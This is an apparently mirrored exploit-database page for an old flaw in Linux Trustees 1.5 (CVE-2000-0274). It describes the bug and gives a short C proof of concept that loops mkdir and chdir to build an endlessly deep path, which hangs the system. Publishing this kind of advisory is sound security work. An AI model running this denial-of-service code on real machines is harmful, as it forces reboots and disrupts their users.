Lucene search
+L

Bray Systems Linux Trustees 1.5 - Long Pathname

🗓️ 10 Apr 2000 00:00:00Reported by Andrey E. LermanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Bray Systems Linux Trustees can hang when handling long file paths, requiring a system reboot.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2000-0274
2 Jun 200004:00
cve
cvelist
Cvelist
CVE-2000-0274
2 Jun 200004:00
cvelist
euvd
EUVD
EUVD-2000-0273
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-0274
10 Apr 200004:00
nvd
ptsecurity
Positive Technologies
PT-2000-1256 · Linux · Linux
10 Apr 200000:00
ptsecurity
// source: https://www.securityfocus.com/bid/1096/info

Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00977
33